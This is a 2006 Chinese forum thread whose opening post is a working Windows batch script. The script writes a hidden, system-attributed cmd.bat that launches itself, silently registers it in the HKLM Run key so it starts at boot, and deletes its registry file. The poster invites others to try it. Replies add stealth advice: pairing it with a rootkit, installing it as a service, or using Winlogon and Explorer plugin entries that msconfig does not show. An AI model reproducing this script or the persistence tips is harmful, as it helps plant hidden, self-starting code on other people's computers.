〖灌水〗一个小batch.嘿嘿

小麻哈鱼 · 发表于 2006-2-23 20:41

@echo off
echo start %systemroot%\system32\cmd.bat>>%systemroot%\system32\cmd.bat
attrib +h +s +r %systemroot%\system32\cmd.bat
echo Windows Registry Editor Version 5.00 >>%systemroot%\cmd.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>%systemroot%\cmd.reg
echo "cmd"="c:\\windows\\system32\\cmd.bat">>%systemroot%\cmd.reg
regedit /s %systemroot%\cmd.reg
del %systemroot%\cmd.reg

小麻哈鱼 · 发表于 2006-2-23 20:51

没注册表监控软件的可以试下，很X的

笨笨啊 · 发表于 2006-3-2 10:41

都加到启动项了，还不明显啊？

小麻哈鱼 · 发表于 2006-3-2 11:06

这个配合rootkit才有生命力，加到services也比较隐藏，
没什么意义，可以理解下有些马儿的原理。 [s:2]

笨笨啊 · 发表于 2006-3-2 11:08

不过最好还是加在winlogon，或者是explorer的插件启动项里，这样开机即引导
，而且在常用的msconfig里不可见

小麻哈鱼 · 发表于 2006-3-4 11:45

这些很少见哎，加载在explorer里的见过个dll的，
regsvc32 /u下就好了，呵呵。
[s:2]

〖灌水〗一个小batch.嘿嘿

浏览过的版块